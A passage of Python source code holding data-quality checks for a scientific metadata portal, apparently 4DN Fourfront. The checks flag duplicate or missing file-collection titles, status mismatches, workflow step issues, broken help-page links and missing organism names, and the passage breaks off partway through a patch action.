'@id': expset['@id'],
'errors': []}
if 'Missing title' in e:
info['errors'] += ['ExperimentSet {} has an other_processed_files collection with a missing title.'.format(expset['accession'])]
if 'Duplicate title' in e:
info['errors'] += ['ExperimentSet {} has 2+ other_processed_files collections with duplicated titles.'.format(expset['accession'])]
errors.append(info)
if errors:
check.status = 'WARN'
check.summary = 'Experiment Sets found with duplicate/missing titles in other_processed_files'
check.description = '{} Experiment Sets have other_processed_files collections with missing or duplicate titles.'.format(len(errors))
else:
check.status = 'PASS'
check.summary = 'No issues found with other_processed_files of experiment sets'
check.description = '0 Experiment Sets have other_processed_files collections with missing or duplicate titles.'
check.full_output = errors
check.brief_output = {'missing title': [item['uuid'] for item in errors if 'missing' in ''.join(item['errors'])],
'duplicate title': [item['uuid'] for item in errors if 'duplicated' in ''.join(item['errors'])]}
return check
@check_function()
def expset_opf_unique_files_in_experiments(connection, **kwargs):
'''
checks experiment sets with other_processed_files and looks for other_processed_files collections
in child experiments to make sure that (1) the collections have titles and (2) that if the titles
are shared with the parent experiment set, that the filenames contained within are unique
'''
check = CheckResult(connection, 'expset_opf_unique_files_in_experiments')
opf_expsets = ff_utils.search_metadata('search/?type=ExperimentSet&other_processed_files.files.uuid%21=No+value',
key=connection.ff_keys, page_limit=25)
errors = []
for expset in opf_expsets:
expset_titles = {fileset.get('title'): fileset.get('files') for fileset in expset['other_processed_files'] if fileset.get('title')}
if not expset.get('experiments_in_set'):
continue
for expt in (exp for exp in expset.get('experiments_in_set') if exp.get('other_processed_files')):
e = []
for opf_set in expt['other_processed_files']:
# look for missing names
if not opf_set.get('title'):
e.append('Experiment {} in Experiment Set {} has an other_processed_files set '
'missing a title.'.format(expt['accession'], expset['accession']))
# look for duplicate names
elif opf_set.get('title') in expset_titles.keys() and opf_set.get('files'):
for opf_file in opf_set['files']:
# if duplicate names, look for duplicate file names
if opf_file in expset_titles[opf_set['title']]:
e.append('Experiment {} other_processed_files collection with title `{}` has file {} which '
'is also present in parent ExperimentSet {} other_processed_files collection of the '
'same name.'.format(expt['accession'], opf_set['title'], opf_file['accession'], expset['accession']))
if e:
errors.append({'uuid': expt['uuid'],
'@id': expt['@id'],
'error_details': e})
if errors:
check.status = 'WARN'
check.summary = '{} experiments found with issues in other_processed_files'.format(len(errors))
check.description = ('{} Experiments found that are either missing titles for sets of other_processed_files,'
                             ' or have non-unique filenames in other_processed_files'.format(len(errors)))
else:
check.status = 'PASS'
check.summary = 'No issues found with other_processed_files of experiments'
check.description = ('0 Experiments found to be missing titles for sets of other_processed_files,'
' or have non-unique filenames in other_processed_files')
check.full_output = errors
check.brief_output = {'missing title': [item['uuid'] for item in errors if 'missing' in ''.join(item['error_details'])],
'duplicate title': [item['uuid'] for item in errors if 'also present in parent' in ''.join(item['error_details'])]}
return check
@check_function(days_back=14)
def expset_opf_unique_files(connection, **kwargs):
'''
    Checks Experiments and Experiment Sets with other_processed_files and reports
    if any opf is also present among the raw, processed or reference files.
'''
check = CheckResult(connection, 'expset_opf_unique_files')
days_back = kwargs.get('days_back')
from_date_query, from_text = wrangler_utils.last_modified_from(days_back)
# opfs can be on Exps or ExpSets: search ExpSets for each case and merge results
opf_query = ('other_processed_files.files.uuid%21=No+value' +
from_date_query +
'&field=experiments_in_set&field=processed_files&field=other_processed_files')
opf_sets = ff_utils.search_metadata(
'search/?type=ExperimentSet&' + opf_query, key=connection.ff_keys)
opf_exps = ff_utils.search_metadata(
'search/?type=ExperimentSet&experiments_in_set.' + opf_query, key=connection.ff_keys)
# merge
es_list = [expset['@id'] for expset in opf_sets]
for expset in opf_exps:
if expset['@id'] not in es_list:
opf_sets.append(expset)
errors = {}
for expset in opf_sets:
# skip sets without experiments
if not expset.get('experiments_in_set'):
continue
opfs_id = [] # list opfs @id in the ExpSet and Exps
all_files = [] # list all raw, processed and reference files in the ExpSet
if expset.get('other_processed_files'):
opfs_id.extend([f['@id'] for grp in expset['other_processed_files'] for f in grp.get('files', [])])
for exp in expset['experiments_in_set']:
if exp.get('other_processed_files'):
opfs_id.extend([f['@id'] for grp in exp['other_processed_files'] for f in grp.get('files', [])])
all_files.extend([f['@id'] for f in exp.get('files', [])])
all_files.extend([f['@id'] for f in exp.get('processed_files', [])])
all_files.extend([f['@id'] for f in exp.get('reference_files', [])])
all_files.extend([f['@id'] for f in expset.get('processed_files', [])])
# compare opfs and files lists to find duplicates
for opf in opfs_id:
if opf in all_files:
errors.setdefault(expset['@id'], []).append(opf)
if errors:
check.status = 'WARN'
check.summary = '{} exp sets found with files that are also other_processed_files'.format(len(errors))
check.description = ('{} Experiment Sets {}found that have other_processed_files'
' which are also present in raw, processed or reference files'.format(len(errors), from_text))
else:
check.status = 'PASS'
check.summary = 'No exp sets found with files that are also other_processed_files'
check.description = ('No Experiment Sets {}found that have other_processed_files'
' which are also present in raw, processed or reference files'.format(from_text))
check.full_output = errors
return check
@check_function()
def paired_end_info_consistent(connection, **kwargs):
'''
Check that fastqs with a paired_end number have a paired_with related_file, and vice versa
'''
check = CheckResult(connection, 'paired_end_info_consistent')
search1 = 'search/?type=FileFastq&file_format.file_format=fastq&related_files.relationship_type=paired+with&paired_end=No+value'
search2 = 'search/?type=FileFastq&file_format.file_format=fastq&related_files.relationship_type!=paired+with&paired_end%21=No+value'
results1 = ff_utils.search_metadata(search1 + '&frame=object', key=connection.ff_keys)
results2 = ff_utils.search_metadata(search2 + '&frame=object', key=connection.ff_keys)
results = {'paired with file missing paired_end number':
[result1['@id'] for result1 in results1],
'file with paired_end number missing "paired with" related_file':
[result2['@id'] for result2 in results2]}
if [val for val in results.values() if val]:
check.status = 'WARN'
check.summary = 'Inconsistencies found in FileFastq paired end info'
check.description = ('{} files found with a "paired with" related_file but missing a paired_end number; '
'{} files found with a paired_end number but missing related_file info'
''.format(len(results['paired with file missing paired_end number']),
len(results['file with paired_end number missing "paired with" related_file'])))
else:
check.status = 'PASS'
check.summary = 'No inconsistencies in FileFastq paired end info'
check.description = 'All paired end fastq files have both paired end number and "paired with" related_file'
check.full_output = results
check.brief_output = [item for val in results.values() for item in val]
return check
@check_function()
def workflow_properties(connection, **kwargs):
check = CheckResult(connection, 'workflow_properties')
workflows = ff_utils.search_metadata('search/?type=Workflow&category!=provenance&frame=object',
key=connection.ff_keys)
bad = {'Duplicate Input Names in Workflow Step': [],
'Duplicate Output Names in Workflow Step': [],
'Duplicate Input Source Names in Workflow Step': [],
'Duplicate Output Target Names in Workflow Step': [],
'Missing meta.file_format property in Workflow Step Input': [],
'Missing meta.file_format property in Workflow Step Output': []}
by_wf = {}
for wf in workflows:
# print(wf['@id'])
issues = []
for step in wf.get('steps'):
# no duplicates in input names
step_inputs = step.get('inputs')
for step_input in step_inputs:
if (step_input['meta'].get('type') in ['data file', 'reference file'] and not
step_input['meta'].get('file_format')):
issues.append('Missing meta.file_format property in Workflow Step `{}` Input `{}`'
''.format(step.get('name'), step_input.get('name')))
input_names = [step_input.get('name') for step_input in step_inputs]
if len(list(set(input_names))) != len(input_names):
issues.append('Duplicate Input Names in Workflow Step {}'.format(step.get('name')))
# no duplicates in input source names
sources = [(source.get('name'), source.get('step', "GLOBAL")) for
step_input in step_inputs for source in step_input.get('source')]
if len(sources) != len(list(set(sources))):
issues.append('Duplicate Input Source Names in Workflow Step {}'.format(step.get('name')))
# no duplicates in output names
step_outputs = step.get('outputs')
for step_output in step_outputs:
if (step_output['meta'].get('type') in ['data file', 'reference file'] and not
step_output['meta'].get('file_format')):
issues.append('Missing meta.file_format property in Workflow Step `{}` Output `{}`'
''.format(step.get('name'), step_output.get('name')))
output_names = [step_output.get('name') for step_output in step_outputs]
if len(list(set(output_names))) != len(output_names):
issues.append('Duplicate Output Names in Workflow Step {}'.format(step.get('name')))
# no duplicates in output target names
targets = [(target.get('name'), target.get('step', 'GLOBAL')) for step_output in
step_outputs for target in step_output.get('target')]
if len(targets) != len(list(set(targets))):
issues.append('Duplicate Output Target Names in Workflow Step {}'.format(step.get('name')))
if not issues:
continue
errors = ' '.join(issues)
if 'Duplicate Input Names' in errors:
bad['Duplicate Input Names in Workflow Step'].append(wf['@id'])
if 'Duplicate Output Names' in errors:
bad['Duplicate Output Names in Workflow Step'].append(wf['@id'])
if 'Duplicate Input Source Names' in errors:
bad['Duplicate Input Source Names in Workflow Step'].append(wf['@id'])
if 'Duplicate Output Target Names' in errors:
bad['Duplicate Output Target Names in Workflow Step'].append(wf['@id'])
if '` Input `' in errors:
bad['Missing meta.file_format property in Workflow Step Input'].append(wf['@id'])
if '` Output `' in errors:
bad['Missing meta.file_format property in Workflow Step Output'].append(wf['@id'])
by_wf[wf['@id']] = issues
if by_wf:
check.status = 'WARN'
check.summary = 'Workflows found with issues in `steps`'
check.description = ('{} workflows found with duplicate item names or missing fields'
' in `steps`'.format(len(by_wf.keys())))
else:
check.status = 'PASS'
check.summary = 'No workflows with issues in `steps` field'
check.description = ('No workflows found with duplicate item names or missing fields'
' in steps property')
check.brief_output = bad
check.full_output = by_wf
return check
@check_function()
def page_children_routes(connection, **kwargs):
check = CheckResult(connection, 'page_children_routes')
page_search = 'search/?type=Page&format=json&children.name%21=No+value'
results = ff_utils.search_metadata(page_search, key=connection.ff_keys)
problem_routes = {}
for result in results:
if result['name'] != 'resources/data-collections':
bad_children = [child['name'] for child in result['children'] if
child['name'] != result['name'] + '/' + child['name'].split('/')[-1]]
if bad_children:
problem_routes[result['name']] = bad_children
if problem_routes:
check.status = 'WARN'
check.summary = 'Pages with bad routes found'
check.description = ('{} child pages whose route is not a direct sub-route of parent'
''.format(sum([len(val) for val in problem_routes.values()])))
else:
check.status = 'PASS'
check.summary = 'No pages with bad routes'
check.description = 'All routes of child pages are a direct sub-route of parent page'
check.full_output = problem_routes
return check
@check_function()
def check_help_page_urls(connection, **kwargs):
check = CheckResult(connection, 'check_help_page_urls')
server = connection.ff_keys['server']
help_results = ff_utils.search_metadata(
'search/?type=StaticSection&q=help&status=released&field=body&field=options',
key=connection.ff_keys
)
resource_results = ff_utils.search_metadata(
'search/?type=StaticSection&q=resources&status=released&field=body&field=options',
key=connection.ff_keys
)
results = help_results
results = results + [item for item in resource_results if item['@id'] not in [res['@id'] for res in results]]
sections_w_broken_links = {}
addl_exceptions = {}
timeouts = {}
for result in results:
broken_links = []
body = result.get('body', '')
urls = []
if result.get('options', {}).get('filetype') == 'md':
# look for markdown links - e.g. [text](link)
links = re.findall(r'\[[^\]]+\]\([^\)]+\)', body)
for link in links:
# test only link part of match (not text part, even if it looks like a link)
idx = link.index(']')
url = link[link.index('(', idx)+1:-1]
urls.append(url)
# remove these from body so body can be checked for other types of links
body = body[:body.index(link)] + body[body.index(link)+len(link):]
# looks for links starting with http (full) or / (relative) inside parentheses or brackets
urls += re.findall(r'[\(\[=]["]*(http[^\s\)\]"]+|/[^\s\)\]"]+)[\)\]"]', body)
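        # e.g. '(https://example.org/docs)' or '="/help/intro"' would each yield one captured url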
for url in urls:
if url.startswith('mailto'):
continue
elif 'biorxiv.org' in url.lower():
# biorxiv does not allow programmatic requests - skip
continue
if url.startswith('#'): # section of static page
url = result['@id'] + url
if url.startswith('/'): # fill in appropriate url for relative link
url = server + url
if url.startswith(server.rstrip('/') + '/search/') or url.startswith(server.rstrip('/') + '/browse/'):
continue
try:
                request = requests.get(url.replace('&amp;', '&'), timeout=2)
if request.status_code == 403 and 'doi.org' in url:
# requests to doi.org that get redirected to biorxiv fail with 403
addl_exceptions.setdefault(result['@id'], {})
addl_exceptions[result['@id']][url] = str(403)
elif request.status_code not in [200, 412]:
broken_links.append((url, request.status_code))
except requests.exceptions.Timeout:
timeouts.setdefault(result['@id'], [])
timeouts[result['@id']].append(url)
except requests.exceptions.SSLError:
continue
except Exception as e:
addl_exceptions.setdefault(result['@id'], {})
addl_exceptions[result['@id']][url] = str(e)
if broken_links:
sections_w_broken_links[result['@id']] = broken_links
if sections_w_broken_links:
check.status = 'WARN'
check.summary = 'Broken links found'
check.description = ('{} static sections currently have broken links.'
''.format(len(sections_w_broken_links.keys())))
else:
check.status = 'PASS'
check.summary = 'No broken links found'
check.description = check.summary
check.full_output = {
'broken links': sections_w_broken_links,
'timed out requests': timeouts,
'additional exceptions': addl_exceptions
}
return check
@check_function(run_on_uuid_list=None, add_res_to_ignore=False, reset_ignore=False)
def check_search_urls(connection, **kwargs):
'''Check for URLs in static sections that link to a search or browse page
and return no results. Keeps a list of items to ignore.
Args:
- run_on_uuid_list: if present, run the check only on these items (list of
uuids, comma separated).
- add_res_to_ignore: if True, add all results to the ignore list and they
will not show up next time (default is False). Use in combination with run_on_uuid_list.
- reset_ignore: if True, empty the ignore list (default is False).
Results:
    - full_output.result: static sections that have URLs to search/browse returning 0 results.
- full_output.ignore: static sections in the ignore list are not checked by
current and future runs of the check. Can be modified by check kwargs.
'''
check = CheckResult(connection, 'check_search_urls')
# get items to ignore from previous check result, unless reset_ignore is True
if kwargs.get('reset_ignore') is True:
ignored_sections = []
else:
last_result = check.get_primary_result()
# if last one was fail, find an earlier check with non-FAIL status
it = 0
while last_result['status'] == 'ERROR' or not last_result['kwargs'].get('primary'):
it += 1
hours = it * 7 * 24 # this is a weekly check, so look for checks with 7 days iteration
last_result = check.get_closest_result(diff_hours=hours)
if it > 4:
check.summary = 'Cannot find a non-fail primary check in the past 4 weeks'
check.status = 'ERROR'
return check
# remove cases previously ignored
ignored_sections = last_result['full_output'].get('ignore', [])
query = 'search/?type=StaticSection&status%21=deleted&status%21=draft'
# if check is limited to certain uuids
if kwargs.get('run_on_uuid_list'):
uuids = kwargs['run_on_uuid_list'].split(',')
query += ''.join(['&uuid=' + u.strip() for u in uuids])
results = ff_utils.search_metadata(query + '&field=body&field=uuid',
key=connection.ff_keys)
problematic_sections = {}
results_filtered = [r for r in results if r['uuid'] not in ignored_sections]
for result in results_filtered:
body = result.get('body', '')
# search links for search or browse pages, either explicit or relative
urls = re.findall(r'[\(\[=]["]*(?:[^\s\)\]"]+(?:4dnucleome|elasticbeanstalk)[^\s\)\]"]+|/)((?:browse|search)/\?[^\s\)\]"]+)[\)\]"]', body)
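        # e.g. '[sets](https://data.4dnucleome.org/browse/?type=ExperimentSetReplicate)' or a relative
        # '(/search/?type=Biosample)' would yield the captured queries 'browse/?type=...' and 'search/?type=...'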
if urls:
for url in urls:
                url = url.replace('&amp;', '&')  # replace HTML-escaped &amp;
url = re.sub(r'&limit=[^&]*|limit=[^&]*&?', '', url) # remove limit if present
q_results = ff_utils.search_metadata(url + '&limit=1&field=uuid', key=connection.ff_keys)
if len(q_results) == 0:
problematic_sections.setdefault(result['uuid'], [])
problematic_sections[result['uuid']].append(url)
# move results to ignored if add_res_to_ignore == True
if problematic_sections and kwargs.get('add_res_to_ignore') is True:
ignored_sections.extend([uuid for uuid in problematic_sections.keys() if uuid not in ignored_sections])
problematic_sections = {}
if problematic_sections:
check.status = 'WARN'
check.summary = 'Empty search links found'
check.description = ('{} static sections currently have empty search links.'
''.format(len(problematic_sections.keys())))
else:
check.status = 'PASS'
check.summary = 'No empty search links found'
check.description = check.summary
check.full_output = {'result': problematic_sections, 'ignore': ignored_sections}
return check
@check_function(id_list=None)
def check_status_mismatch(connection, **kwargs):
check = CheckResult(connection, 'check_status_mismatch')
id_list = kwargs['id_list']
MIN_CHUNK_SIZE = 200
# embedded sub items should have an equal or greater level
# than that of the item in which they are embedded
id2links = {}
id2status = {}
id2item = {}
stati2search = ['released', 'released_to_project']
items2search = ['ExperimentSet']
item_search = 'search/?frame=object'
for item in items2search:
item_search += '&type={}'.format(item)
for status in stati2search:
item_search += '&status={}'.format(status)
if id_list:
itemids = re.split(',|\s+', id_list)
itemids = [id for id in itemids if id]
else:
itemres = ff_utils.search_metadata(item_search, key=connection.ff_keys, page_limit=500)
itemids = [item.get('uuid') for item in itemres]
es_items = ff_utils.get_es_metadata(itemids, key=connection.ff_keys, chunk_size=200, is_generator=True)
for es_item in es_items:
label = es_item.get('embedded').get('display_title')
desc = es_item.get('object').get('description')
lab = es_item.get('embedded').get('lab').get('display_title')
status = es_item.get('properties').get('status', 'in review by lab')
opfs = _get_all_other_processed_files(es_item)
id2links[es_item.get('uuid')] = [li.get('uuid') for li in es_item.get('linked_uuids_embedded')]
id2status[es_item.get('uuid')] = STATUS_LEVEL.get(status)
id2item[es_item.get('uuid')] = {'label': label, 'status': status, 'lab': lab,
'description': desc, 'to_ignore': list(set(opfs))}
mismatches = {}
linked2get = {}
for i, iid in enumerate(itemids):
linkedids = id2links.get(iid)
if not linkedids: # item with no link
continue
istatus = id2status.get(iid)
for lid in linkedids:
lstatus = id2status.get(lid)
if not lstatus: # add to list to get
linked2get.setdefault(lid, []).append(iid)
elif lstatus < istatus: # status mismatch for an item we've seen before
ignore = id2item.get(iid).get('to_ignore')
if ignore is not None and lid in ignore:
continue
else:
mismatches.setdefault(iid, []).append(lid)
        if len(linked2get) > MIN_CHUNK_SIZE or i + 1 == len(itemids):  # only query es once at least MIN_CHUNK_SIZE ids have accumulated, or at the end of the list
linked2chk = ff_utils.get_es_metadata(list(linked2get.keys()), key=connection.ff_keys,
chunk_size=200, is_generator=True)
for litem in linked2chk:
luuid = litem.get('uuid')
listatus = litem.get('properties').get('status', 'in review by lab')
llabel = litem.get('item_type')
lstatus = STATUS_LEVEL.get(listatus)
# add info to tracking dict
id2status[luuid] = lstatus
id2item[luuid] = {'label': llabel, 'status': listatus}
for lfid in set(linked2get[luuid]):
# check to see if the linked item is something to ignore for that item
ignore = id2item[lfid].get('to_ignore')
if ignore is not None and luuid in ignore:
continue
elif lstatus < id2status[lfid]: # status mismatch so add to report
mismatches.setdefault(lfid, []).append(luuid)
linked2get = {} # reset the linked id dict
if mismatches:
brief_output = {}
full_output = {}
for eid, mids in mismatches.items():
eset = id2item.get(eid)
key = '{} | {} | {} | {}'.format(
eid, eset.get('label'), eset.get('status'), eset.get('description'))
brief_output.setdefault(eset.get('lab'), {}).update({key: len(mids)})
for mid in mids:
mitem = id2item.get(mid)
val = '{} | {} | {}'.format(mid, mitem.get('label'), mitem.get('status'))
full_output.setdefault(eset.get('lab'), {}).setdefault(key, []).append(val)
check.status = 'WARN'
check.summary = "MISMATCHED STATUSES FOUND"
check.description = 'Released or pre-release items have linked items with unreleased status'
check.brief_output = brief_output
check.full_output = full_output
else:
check.status = 'PASS'
check.summary = "NO MISMATCHES FOUND"
check.description = 'all statuses present and correct'
return check
@check_function(id_list=None)
def check_opf_status_mismatch(connection, **kwargs):
'''
Check to make sure that collections of other_processed_files don't have
status mismatches. Specifically, checks that (1) all files in an
other_processed_files collection have the same status; and (2) the status of
the experiment set is on the same status level or higher than the status of
    files in the other_processed_files collection (e.g., the other_processed_files
    should not be released while the experiment set is still in review by lab).
'''
check = CheckResult(connection, 'check_opf_status_mismatch')
opf_set = ('search/?type=ExperimentSet&other_processed_files.title%21=No+value&field=status'
'&field=other_processed_files&field=experiments_in_set.other_processed_files')
opf_exp = ('search/?type=ExperimentSet&other_processed_files.title=No+value'
'&experiments_in_set.other_processed_files.title%21=No+value'
'&field=experiments_in_set.other_processed_files&field=status')
opf_set_results = ff_utils.search_metadata(opf_set, key=connection.ff_keys)
opf_exp_results = ff_utils.search_metadata(opf_exp, key=connection.ff_keys)
results = opf_set_results + opf_exp_results
# extract file uuids
files = []
for result in results:
if result.get('other_processed_files'):
for case in result['other_processed_files']:
files.extend([i['uuid'] for i in case['files']])
if case.get('higlass_view_config'):
files.append(case['higlass_view_config'].get('uuid'))
if result.get('experiments_in_set'):
for exp in result['experiments_in_set']:
for case in exp['other_processed_files']:
files.extend([i['uuid'] for i in case['files']])
# get metadata for files, to collect status
resp = ff_utils.get_es_metadata(list(set(files)),
sources=['links.quality_metric', 'object.status', 'uuid'],
key=connection.ff_keys)
opf_status_dict = {item['uuid']: item['object']['status'] for item in resp if item['uuid'] in files}
opf_linked_dict = {
item['uuid']: item.get('links', {}).get('quality_metric', []) for item in resp if item['uuid'] in files
}
quality_metrics = [uuid for item in resp for uuid in item.get('links', {}).get('quality_metric', [])]
qm_resp = ff_utils.get_es_metadata(list(set(quality_metrics)),
sources=['uuid', 'object.status'],
key=connection.ff_keys)
    opf_other_dict = {item['uuid']: item['object']['status'] for item in qm_resp if item['uuid'] not in files}
check.full_output = {}
for result in results:
hg_dict = {item['title']: item.get('higlass_view_config', {}).get('uuid')
for item in result.get('other_processed_files', [])}
titles = [item['title'] for item in result.get('other_processed_files', [])]
titles.extend([item['title'] for exp in result.get('experiments_in_set', [])
for item in exp.get('other_processed_files', [])])
titles = list(set(titles))
problem_dict = {}
for title in titles:
file_list = [item for fileset in result.get('other_processed_files', [])
for item in fileset['files'] if fileset['title'] == title]
file_list.extend([item for exp in result.get('experiments_in_set', [])
for fileset in exp['other_processed_files']
for item in fileset['files'] if fileset['title'] == title])
statuses = set([opf_status_dict[f['uuid']] for f in file_list])
# import pdb; pdb.set_trace()
if not statuses:
# to account for empty sections that may not yet contain files
pass
elif len(statuses) > 1: # status mismatch in opf collection
scores = set([STATUS_LEVEL.get(status, 0) for status in list(statuses)])
if len(scores) > 1:
problem_dict[title] = {f['@id']: {'status': opf_status_dict[f['uuid']]} for f in file_list}
if hg_dict.get(title):
problem_dict[title][hg_dict[title]] = {'status': opf_status_dict[hg_dict[title]]}
elif hg_dict.get(title) and STATUS_LEVEL[list(statuses)[0]] != STATUS_LEVEL[opf_status_dict[hg_dict[title]]]:
if not (list(statuses)[0] == 'pre-release' and opf_status_dict[hg_dict[title]] == 'released to lab'):
problem_dict[title] = {'files': list(statuses)[0],
'higlass_view_config': opf_status_dict[hg_dict[title]]}
elif STATUS_LEVEL[result['status']] < STATUS_LEVEL[list(statuses)[0]]:
problem_dict[title] = {result['@id']: result['status'], title: list(statuses)[0]}
for f in file_list:
if opf_linked_dict.get(f['uuid']):
for qm in opf_linked_dict[f['uuid']]:
if (STATUS_LEVEL[opf_other_dict[qm]] != STATUS_LEVEL[opf_status_dict[f['uuid']]]):
if title not in problem_dict:
problem_dict[title] = {}
if f['@id'] not in problem_dict[title]:
problem_dict[title][f['@id']] = {}
problem_dict[title][f['@id']]['quality_metric'] = {
'uuid': opf_linked_dict[f['uuid']], 'status': opf_other_dict[qm]
}
if problem_dict:
check.full_output[result['@id']] = problem_dict
if check.full_output:
check.brief_output = list(check.full_output.keys())
check.status = 'WARN'
check.summary = 'Other processed files with status mismatches found'
check.description = ('{} Experiment Sets found with status mismatches in '
'other processed files'.format(len(check.brief_output)))
else:
check.status = "PASS"
check.summary = 'All other processed files have matching statuses'
check.description = 'No Experiment Sets found with status mismatches in other processed files'
return check
@check_function()
def check_validation_errors(connection, **kwargs):
'''
Counts number of items in fourfront with schema validation errors,
returns link to search if found.
'''
check = CheckResult(connection, 'check_validation_errors')
search_url = 'search/?validation_errors.name!=No+value&type=Item'
results = ff_utils.search_metadata(search_url + '&field=@id', key=connection.ff_keys)
if results:
types = {item for result in results for item in result['@type'] if item != 'Item'}
check.status = 'WARN'
check.summary = 'Validation errors found'
check.description = ('{} items found with validation errors, comprising the following '
'item types: {}. \nFor search results see link below.'.format(
len(results), ', '.join(list(types))))
check.ff_link = connection.ff_server + search_url
else:
check.status = 'PASS'
check.summary = 'No validation errors'
check.description = 'No validation errors found.'
return check
def _get_all_other_processed_files(item):
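    '''
    Helper: collect uuids of other_processed_files linked from an es item (directly
    and via its embedded experiments), plus their quality metrics and higlass view
    configs, so that check_status_mismatch can ignore them when reporting mismatches.
    '''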
toignore = []
# get directly linked other processed files
for pfinfo in item.get('properties').get('other_processed_files', []):
toignore.extend([pf for pf in pfinfo.get('files', []) if pf is not None])
# toignore.extend([pf['quality_metric'] for pf in pfinfo.get('files', []) if pf and pf.get('quality_metric')])
# qcs = [pf for pf in pfinfo.get('files', []) if pf is not None]
hgv = pfinfo.get('higlass_view_config')
if hgv:
toignore.append(hgv)
# experiment sets can also have linked opfs from experiment
for pfinfo in item['embedded'].get('other_processed_files', []):
toignore.extend([pf['quality_metric']['uuid'] for pf in pfinfo.get('files') if pf and pf.get('quality_metric')])
expts = item.get('embedded').get('experiments_in_set')
if expts is not None:
for exp in expts:
opfs = exp.get('other_processed_files')
if opfs is not None:
for pfinfo in opfs:
toignore.extend([pf.get('uuid') for pf in pfinfo.get('files', []) if pf is not None])
toignore.extend([pf['quality_metric']['uuid'] for pf in pfinfo.get('files', []) if pf and pf.get('quality_metric')])
hgv = pfinfo.get('higlass_view_config')
if hgv:
toignore.append(hgv)
return toignore
@check_function()
def check_bio_feature_organism_name(connection, **kwargs):
'''
Attempts to identify an organism to add to the organism_name field in BioFeature items
checks the linked genes or the genomic regions and then description
'''
check = CheckResult(connection, 'check_bio_feature_organism_name')
check.action = "patch_bio_feature_organism_name"
# create some mappings
organism_search = 'search/?type=Organism'
organisms = ff_utils.search_metadata(organism_search, key=connection.ff_keys)
orgn2name = {o.get('@id'): o.get('name') for o in organisms}
# add special cases
orgn2name['unspecified'] = 'unspecified'
orgn2name['multiple organisms'] = 'multiple organisms'
genome2orgn = {o.get('genome_assembly'): o.get('@id') for o in organisms if 'genome_assembly' in o}
gene_search = 'search/?type=Gene'
genes = ff_utils.search_metadata(gene_search, key=connection.ff_keys)
gene2org = {g.get('@id'): g.get('organism').get('@id') for g in genes}
# get all BioFeatures
biofeat_search = 'search/?type=BioFeature'
biofeatures = ff_utils.search_metadata(biofeat_search, key=connection.ff_keys)
matches = 0
name_trumps_guess = 0
mismatches = 0
to_patch = {}
brief_report = []
to_report = {'name_trumps_guess': {}, 'lost_and_found': {}, 'orphans': {}, 'mismatches': {}}
for biofeat in biofeatures:
linked_orgn_name = None
orgn_name = biofeat.get('organism_name')
biogenes = biofeat.get('relevant_genes')
if biogenes is not None:
borgns = [gene2org.get(g.get('@id')) for g in biogenes if '@id' in g]
linked_orgn_name = _get_orgname_from_atid_list(borgns, orgn2name)
if not linked_orgn_name: # didn't get it from genes - try genomic regions
gen_regions = biofeat.get('genome_location')
if gen_regions is not None:
grorgns = []
for genreg in gen_regions:
assembly_in_dt = False
gr_dt = genreg.get('display_title')
for ga, orgn in genome2orgn.items():
if ga in gr_dt:
grorgns.append(orgn)
assembly_in_dt = True
break
if not assembly_in_dt:
gr_res = ff_utils.get_es_metadata([genreg.get('uuid')],
key=connection.ff_keys, sources=['properties.genome_assembly'])
try:
gr_ass = gr_res[0].get('properties').get('genome_assembly')
except AttributeError:
gr_ass = None
if gr_ass is not None:
for ga, orgn in genome2orgn.items():
if ga == gr_ass:
grorgns.append(orgn)
linked_orgn_name = _get_orgname_from_atid_list(grorgns, orgn2name)
if not linked_orgn_name: # and finally try Description
desc = biofeat.get('description')
if desc is not None:
for o in orgn2name.values():
if o in desc.lower():
linked_orgn_name = o
break
# we've done our best now check and create output
bfuuid = biofeat.get('uuid')
bfname = biofeat.get('display_title')
if not orgn_name:
if linked_orgn_name:
to_patch[bfuuid] = {'organism_name': linked_orgn_name}
brief_report.append('{} MISSING ORGANISM - PATCH TO {}'.format(bfname, linked_orgn_name))
to_report['lost_and_found'].update({bfuuid: linked_orgn_name})
else:
brief_report.append('{} MISSING ORGANISM - NO GUESS'.format(bfname))
to_report['orphans'].update({bfuuid: None})
else:
if linked_orgn_name:
if orgn_name != linked_orgn_name:
if linked_orgn_name == 'unspecified' or orgn_name == 'engineered reagent':
                        # 'unspecified' here means an organism (or multiple organisms) could not be determined from linked genes or other criteria;
                        # for 'engineered reagent' a linked name may be found depending on what is linked to the bio_feature.
                        # We usually want to keep the given 'engineered reagent' label, but it warrants occasional review
name_trumps_guess += 1
to_report['name_trumps_guess'].update({bfuuid: (orgn_name, linked_orgn_name)})
elif orgn_name == 'unspecified': # patch if a specific name is found
to_patch[bfuuid] = {'organism_name': linked_orgn_name}
to_report['mismatches'].update({bfuuid: (orgn_name, linked_orgn_name)})
brief_report.append('{}: CURRENT {} GUESS {} - WILL PATCH!'.format(bfname, orgn_name, linked_orgn_name))
else:
mismatches += 1
to_report['mismatches'].update({bfuuid: (orgn_name, linked_orgn_name)})
brief_report.append('{}: CURRENT {} GUESS {}'.format(bfname, orgn_name, linked_orgn_name))
else:
matches += 1
else:
to_report['name_trumps_guess'].update({bfuuid: (orgn_name, None)})
name_trumps_guess += 1
brief_report.sort()
cnt_rep = [
'MATCHES: {}'.format(matches),
'MISMATCHES TO CHECK: {}'.format(mismatches),
'OK MISMATCHES: {}'.format(name_trumps_guess)
]
check.brief_output = cnt_rep + brief_report
check.full_output = {}
if brief_report:
check.summary = 'Found BioFeatures with organism_name that needs attention'
check.status = 'WARN'
check.allow_action = True
else:
check.status = 'PASS'
check.summary = 'BioFeature organism_name looks good'
if to_report:
to_report.update({'counts': cnt_rep})
check.full_output.update({'info': to_report})
if to_patch:
check.full_output.update({'to_patch': to_patch})
return check
def _get_orgname_from_atid_list(atids, orgn2name):
org_atid = [x for x in list(set(atids)) if x is not None]
if not org_atid:
org_atid = 'unspecified'
elif len(org_atid) == 1:
org_atid = org_atid[0]
else:
org_atid = 'multiple organisms'
return orgn2name.get(org_atid)
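# Illustrative behaviour of the helper above (assuming orgn2name maps e.g.
# '/organisms/human/' to 'human' and includes the special keys added earlier):
#   _get_orgname_from_atid_list(['/organisms/human/'], orgn2name)                      -> 'human'
#   _get_orgname_from_atid_list(['/organisms/human/', '/organisms/mouse/'], orgn2name) -> 'multiple organisms'
#   _get_orgname_from_atid_list([None], orgn2name)                                     -> 'unspecified'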
@action_function()
def patch_bio_feature_organism_name(connection, **kwargs):
action = ActionResult(connection, 'patch_bio_feature_organism_name')
action_logs = {'patch_failure': [], 'patch_success': []}
check_res = action.get_associated_check_result(kwargs)
output = check_res.get('full_output')
patches = output.get('to_patch')
if patches:
for uid, val in patches.items():
try:
